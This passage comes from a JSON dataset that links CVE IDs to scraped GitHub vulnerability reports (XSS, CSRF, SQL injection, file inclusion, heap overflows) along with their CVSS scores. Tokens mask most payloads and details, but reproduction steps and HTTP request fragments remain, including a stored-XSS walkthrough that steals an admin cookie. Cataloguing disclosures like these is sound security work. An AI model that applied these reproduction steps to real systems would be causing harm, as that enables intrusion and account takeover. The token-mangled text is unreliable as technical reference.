        "description": "There is a CSRF vulnerability that can add an admin account. There is one CSRF vulnerability that can add the administrator account An issue was discovered in Eyoucms NUMBERTAG There is a CSRF vulnerability that can add an admin account via APITAG After the admin logged in, open the csrf exp page. ERRORTAG The poc request message: FILETAG After open the csrf exp page, add the hacker5 admin account. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19676",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/2284",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/2284",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2020-01-10T07:17:08Z",
        "description": "Incorrect Access Control. Issue Description There is an Incorrect Access Control in NACOS NUMBERTAG Describe what happened (or what feature you want) Visitors can get service details when not logged in. FILETAG FILETAG Describe what you expected to happen I expect it can be fixed. How to reproduce it (as minimally and precisely as possible NUMBERTAG We can set up an environment locally to get the service details interface. FILETAG NUMBERTAG Then get other nacos service names through the service list interface. FILETAG NUMBERTAG Finally we can get service details when not logged in. FILETAG Tell us your environment NACOS NUMBERTAG Anything else we need to know?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19676",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/1105",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/1105",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2019-04-24T09:55:32Z",
        "description": "Access control of resource in Nacos. APITAG Issue Description Type: feature request Describe what happened (or what feature you want) Access control is numerously required by the community, which is helpful to isolate the resources between different users in production environment. Describe what you expected to happen Different users can be assigned different levels of access privileges for the resources in Nacos, such as service, configuration. How to reproduce it (as minimally and precisely as possible) Tell us your environment Anything else we need to know?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19703",
        "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/107",
        "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/107",
        "Repo_new": "zyx0814/dzzoffice",
        "Issue_Created_At": "2019-07-04T03:59:12Z",
        "description": "Cross site scripting vulnerability exists in Dzzoffice. Cross site scripting vulnerability exists in Dzzoffice POST FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG APITAG pWKa NUMBERTAG sendmail NUMBERTAG Upgrade Insecure Requests NUMBERTAG APITAG There is a cross site scripting attack on the referer parameter Insert payload NUMBERTAG balert NUMBERTAG f NUMBERTAG f NUMBERTAG in the parameter,As shown below: FILETAG Can be successfully executed",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19704",
        "Issue_Url_old": "https://github.com/sail-y/spring-boot-admin/issues/7",
        "Issue_Url_new": "https://github.com/sail-y/spring-boot-admin/issues/7",
        "Repo_new": "sail-y/spring-boot-admin",
        "Issue_Created_At": "2019-07-11T03:44:14Z",
        "description": "There is a stored xss vulnerability via APITAG the controller APITAG exist xss vulnerability FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19705",
        "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/2",
        "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/2",
        "Repo_new": "jorycn/thinkphp-zcms",
        "Issue_Created_At": "2019-07-15T15:36:08Z",
        "description": "There is a sql injection vulnerability via APITAG FILETAG use time based bind injection to prove the vulnerability FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19709",
        "Issue_Url_old": "https://github.com/liufee/feehicms/issues/2",
        "Issue_Url_new": "https://github.com/liufee/feehicms/issues/2",
        "Repo_new": "liufee/feehicms",
        "Issue_Created_At": "2019-07-31T08:24:11Z",
        "description": "Cross site scripting vulnerability exists in Feehicms. Due to the lax filtering of tag parameters, JS code can be inserted to cause cross site scripting attacks.If the tag parameter is assigned to \" APITAG alert NUMBERTAG APITAG APITAG in get mode can cause cross site script attack. FILETAG The exp code is as follows\uff1a URLTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19716",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/980",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/980",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-08-09T08:46:00Z",
        "description": "Buffer overflow caused by exhaustive memory usage . There is a buffer overflow in exi NUMBERTAG in file APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG The compile command is: cmake ./ ;make To reproduce the issue, run: ./exi NUMBERTAG input Here is the trace reported by asan NUMBERTAG faff NUMBERTAG ba NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG bf5e3 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG faff NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG cb4d ( PATHTAG NUMBERTAG faff NUMBERTAG b NUMBERTAG e in operator new FILETAG The attachment is the poc input. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19717",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/416",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/416",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-09T14:02:54Z",
        "description": "Null pointer dereference caused by unhandled exhaustive memory usage. There is a null pointer dereference caused by unhandled exhaustive memory usage in APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. FILETAG FILETAG Here is the trace reported by ASAN NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG ffe1fff1 bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f6e NUMBERTAG in operator new FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19718",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/417",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/417",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-09T14:25:13Z",
        "description": "Null pointer dereference bug. There is a null pointer dereference bug running mp NUMBERTAG aac. It is similar to NUMBERTAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The reason for this problem is due to the mishandled memory allocation: FILETAG Here is the trace reported by ASAN: PATHTAG runtime error: null pointer passed as argument NUMBERTAG which is declared to never be null PATHTAG runtime error: null pointer passed as argument NUMBERTAG which is declared to never be null NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG fffffff8 bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG afa NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG ade NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a2e NUMBERTAG in operator new FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19719",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/414",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/414",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-09T12:45:59Z",
        "description": "Buffer overflow in APITAG There is a buffer overflow in APITAG related to APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag ERRORTAG then run: APITAG This is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f4b NUMBERTAG b NUMBERTAG at pc NUMBERTAG bc1e3 bp NUMBERTAG ff8c NUMBERTAG b8 sp NUMBERTAG ff8c NUMBERTAG a8 WRITE of size NUMBERTAG at NUMBERTAG f4b NUMBERTAG b NUMBERTAG thread T NUMBERTAG bc1e2 in APITAG const&) PATHTAG NUMBERTAG bc1e2 in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG bccb5 in APITAG int, APITAG PATHTAG NUMBERTAG e1ccc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG be NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG dc NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG b in APITAG int, APITAG APITAG PATHTAG NUMBERTAG da NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG da NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a6d NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f4b NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Here is the Poc input: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19720",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/413",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/413",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-09T12:23:30Z",
        "description": "Exhaustive memory usage . There is a buffer overflow inside APITAG of APITAG It is similar to NUMBERTAG and NUMBERTAG mp NUMBERTAG aac input_file /dev/null In file PATHTAG APITAG allocates a new buffer to parse the atom in the stream. The unhandled memory allocation failure causes the read content memcpy to a null pointer. This is the start points. FILETAG In file In file PATHTAG FILETAG APITAG is the macro define of memcpy and the path formed. Asan trace report NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG ff7efffd bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG de NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG in operator new FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19721",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/415",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/415",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-09T13:50:32Z",
        "description": "Heap buffer overflow in APITAG when running mp NUMBERTAG aac. There is a heap buffer overflow in APITAG when running mp NUMBERTAG aac. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag ' DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined' then run: './mp NUMBERTAG aac input /dev/null NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG b NUMBERTAG at pc NUMBERTAG eb6d5 bp NUMBERTAG ffef NUMBERTAG d8 sp NUMBERTAG ffef NUMBERTAG c8 WRITE of size NUMBERTAG at NUMBERTAG f NUMBERTAG b NUMBERTAG thread T NUMBERTAG eb6d4 in APITAG int) PATHTAG NUMBERTAG d7d9b in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG dde NUMBERTAG in APITAG int, APITAG PATHTAG NUMBERTAG dd3b4 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19722",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/418",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/418",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-09T14:41:05Z",
        "description": "buffer overflow in APITAG There is a buffer overflow in APITAG related to APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The occur location in the function APITAG PATHTAG FILETAG Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG cf at pc NUMBERTAG d6d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG ac8 sp NUMBERTAG ffe NUMBERTAG ab8 WRITE of size NUMBERTAG at NUMBERTAG f NUMBERTAG cf thread T NUMBERTAG d6d NUMBERTAG in APITAG int, unsigned long long, APITAG PATHTAG NUMBERTAG ccfbb in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f NUMBERTAG cf is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19750",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1262",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1262",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-05T09:50:55Z",
        "description": "in box_code_base.c line NUMBERTAG has a heap overflow. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! ] I looked for a similar issue and couldn't find any. [ ] I tried with the latest version of GPAC. Installers available at URLTAG [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in box_code_base.c [line NUMBERTAG URLTAG has a heap overflow. CODETAG When str is full without NUMBERTAG strdup will make a heap overflow.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19751",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1272",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1272",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-08T12:35:13Z",
        "description": "in odf_code.c line NUMBERTAG have a heap buffer overflow. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [\u2714 ] I looked for a similar issue and couldn't find any. [\u2714 ] I tried with the latest version of GPAC. Installers available at URLTAG [ \u2714] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in odf_code.c [line NUMBERTAG URLTAG ) The check for size here may have some problems.It will cause a heap APITAG it will resulting in gf_odf_del_ipmp_tool to free a invalid address. Here is the asan's result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19752",
        "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/140",
        "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/140",
        "Repo_new": "kohler/gifsicle",
        "Issue_Created_At": "2019-07-17T02:54:29Z",
        "description": "NULL Pointer Deference vulnerability in find_color_or_error function. In support.c line NUMBERTAG URLTAG , The gfcm could be a NULL pointer in some cases. Here is the usage: gifsicle t NUMBERTAG FILETAG o FILETAG POC here: APITAG Here is Asan's report: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19770",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/180",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/180",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-07-09T09:39:41Z",
        "description": "A stored XSS vulnerability in WUZHI CMS NUMBERTAG This XSS vulnerability was found in the system bulletin(\u7cfb\u7edf\u516c\u544a) in the background. payload: > APITAG \\ APITAG \\ APITAG First we can write payload with a low privileged user named 'test'.As an attacker, you can change a title to prompt an administrator to click on this page. FILETAG Then log in to the admin account and click the change(\u4fee\u6539) button to pop up the admin's cookie. FILETAG FILETAG The reason for the vulnerability is that php code uses blacklists to filter JS code, resulting in poor filtering.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19778",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/23",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/23",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2019-07-10T10:07:10Z",
        "description": "\u7248\u672c\u901a\u6740\u65e0\u6761\u4ef6\u767b\u9646\u4efb\u610f\u7528\u6237. APPLICATION\u3001$params FILETAG \u5229\u7528\u4fee\u6539\u5934\u50cf\u63a5\u53e3 APITAG FILETAG APITAG FILETAG APITAG FILETAG APITAG FILETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19821",
        "Issue_Url_old": "https://github.com/millken/doyocms/issues/3",
        "Issue_Url_new": "https://github.com/millken/doyocms/issues/3",
        "Repo_new": "millken/doyocms",
        "Issue_Created_At": "2019-07-20T04:57:53Z",
        "description": "SQL INJECTION AT ADMIN PAGE. code view: FILETAG payload: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19860",
        "Issue_Url_old": "https://github.com/NLnetLabs/ldns/issues/50",
        "Issue_Url_new": "https://github.com/nlnetlabs/ldns/issues/50",
        "Repo_new": "nlnetlabs/ldns",
        "Issue_Created_At": "2019-09-24T08:11:14Z",
        "description": "heap Out of bound Read. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19861",
        "Issue_Url_old": "https://github.com/NLnetLabs/ldns/issues/51",
        "Issue_Url_new": "https://github.com/nlnetlabs/ldns/issues/51",
        "Repo_new": "nlnetlabs/ldns",
        "Issue_Created_At": "2019-09-26T03:30:58Z",
        "description": "Heap Out of bound Read vulnerability. Description\uff1a When the zone file is parsed, the function ldns_nsec3_salt_data is too trusted for the length value obtained from the zone file. When the memcpy is copied, the NUMBERTAG fe ldns_rdf_size(salt_rdf) byte data can be copied, causing heap information leakage. Vulnerability location\uff1a FILETAG fuzz log\uff1a FILETAG Repaire Suggestion\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19896",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/36",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/36",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2019-08-23T07:27:06Z",
        "description": "file inclusion vulnerability. Require: PHP Version NUMBERTAG magic_quotes_gpc=off NUMBERTAG require $index_file $index_file = PATHTAG $post_old_state = $data FILETAG NUMBERTAG write a page or article with content FILETAG NUMBERTAG can see url is FILETAG so filename is NUMBERTAG kbz NUMBERTAG bat NUMBERTAG use burppsuite,we can find phpinfo in response FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19897",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/183",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/183",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-08-01T08:29:05Z",
        "description": "wuzhicms NUMBERTAG statcode reflected xss vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of APITAG POC ji APITAG APITAG Vulnerability trigger point URLTAG When attacker access system settings basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully NUMBERTAG choose this part and write poc to FILETAG NUMBERTAG submit and view webpage FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19907",
        "Issue_Url_old": "https://github.com/mitre/caldera/issues/462",
        "Issue_Url_new": "https://github.com/mitre/caldera/issues/462",
        "Repo_new": "mitre/caldera",
        "Issue_Created_At": "2019-09-02T10:03:53Z",
        "description": "OS Command Injection in sandcat plugin. login the caldera open the url URLTAG Enter a url, click clone button APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19915",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/173",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/173",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-03-05T10:36:17Z",
